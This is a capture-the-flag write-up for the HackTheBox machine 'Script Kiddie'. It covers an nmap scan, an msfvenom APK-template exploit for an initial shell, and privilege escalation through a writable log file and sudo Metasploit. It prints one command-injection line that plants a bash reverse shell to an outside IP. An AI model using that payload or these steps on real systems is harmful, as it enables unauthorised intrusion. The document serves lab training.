mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 20:13:02 +00:00
106 lines
3.3 KiB
Markdown
106 lines
3.3 KiB
Markdown
# HackTheBox-Script Kiddie
|
|
|
|
## NMAP
|
|
|
|
```
|
|
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-02 19:59 PKT
|
|
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
|
|
NSE Timing: About 99.63% done; ETC: 19:59 (0:00:00 remaining)
|
|
Nmap scan report for 10.10.10.226
|
|
Host is up (0.21s latency).
|
|
|
|
PORT STATE SERVICE VERSION
|
|
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|
|
4444/tcp open krb524?
|
|
| fingerprint-strings:
|
|
| GetRequest, NULL:
|
|
| eNrsvWmXIjmSKPo9fwVddXsCiqhgc3AnTmXNEOz7vmbncHwDHHwB31i66/32J/kq34DIqntn7pmbfboCl0wmk8lkMkkm089/S2mKnKI4MXW8qjtJ/MIJR0lWYyCFVGiOs79piWHt35Ji/z
|
|
rypLqRZMH+lkmRkdwvp4TC8iytOl8SfWDdL1XWkDyNOsoSzSpOHcrV+anuZJZkOHHrJ
|
|
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|
|
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|
|
|_http-title: k1d'5 h4ck3r t00l5
|
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
|
Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds
|
|
|
|
```
|
|
|
|
## PORT 5000 (HTTP)
|
|
|
|
<img src="https://imgur.com/NLLAJJ1.png"/>
|
|
|
|
Here we can do an nmap scan on the machine but if we try to run bash commands it won't work
|
|
|
|
<img src="https://imgur.com/QXOmFOU.png"/>
|
|
|
|
<img src="https://imgur.com/n5mThGc.png"/>
|
|
|
|
Similarly with the msfvenom and searchsploit
|
|
|
|
<img src="https://imgur.com/BzJTgtb.png"/>
|
|
|
|
Msfvenom successfully generetes payload
|
|
|
|
<img src="https://imgur.com/WsEp93j.png"/>
|
|
|
|
But only windows and android payload generates
|
|
|
|
<img src="https://imgur.com/gdGJrIu.png"/>
|
|
|
|
|
|
Also there weren't any hidden directories or files on the webserver this page was only there on the machine. So on googling a little bit I found that `msfvenom` recently had a vulnerability in the process generating payload
|
|
|
|
<img src="https://imgur.com/JtdAtf1.png"/>
|
|
|
|
<img src="https://imgur.com/7PyVLu3.png"/>
|
|
|
|
This was a latest exploit so metasploit needs to be update if you run to any issues when updating metasploit regarding the gem file do this inorder
|
|
|
|
`gem update`
|
|
`cd /usr/share/metasploit-framework`
|
|
`sudo nano Gemfile.lock` (update reline version in that file this important before bundle install)
|
|
`sudo bundle install` ( in metasploit folder)
|
|
|
|
<img src="https://imgur.com/8Q46lfu.png"/>
|
|
|
|
<img src="https://imgur.com/0LR7Eg9.png"/>
|
|
|
|
<img src="https://imgur.com/B2pigeV.png"/>
|
|
|
|
Upload the apk file on the website
|
|
|
|
<img src="https://imgur.com/HCj6XEo.png"/>
|
|
|
|
<img src="https://imgur.com/DD2Z1sO.png"/>
|
|
|
|
And you'll get a shell so we will need to stabilize it
|
|
|
|
<img src="https://imgur.com/1MOGsiD.png"/>
|
|
|
|
Going to `pwn`'s home directory we see a bash script `scanlosers.sh` which was reading a script file from `kid`'s home directory and execute it
|
|
|
|
<img src="https://imgur.com/4vBH6TR.png"/>
|
|
|
|
Seeing that file belongs to `pwn`'s group
|
|
|
|
<img src="https://imgur.com/sOM8Kfa.png"/>
|
|
|
|
We can edit this with a bash reverse shell , this is the way the payload needs to be crafted.
|
|
|
|
`echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.126/1337 0>&1' #" >> hackers`
|
|
|
|
<img src="https://imgur.com/DcTRUUb.png"/>
|
|
|
|
Doing `sudo -l`
|
|
|
|
<img src="https://imgur.com/lwZ1jUB.png"/>
|
|
|
|
Running metasploit as `sudo`
|
|
|
|
<img src="https://imgur.com/CVSx2Ia.png"/>
|
|
|
|
We can now run commands as `root`
|
|
|
|
<img src="https://imgur.com/ZE6bFiQ.png"/>
|
|
|
|
<img src="https://imgur.com/r0Xsgrw.png"/>
|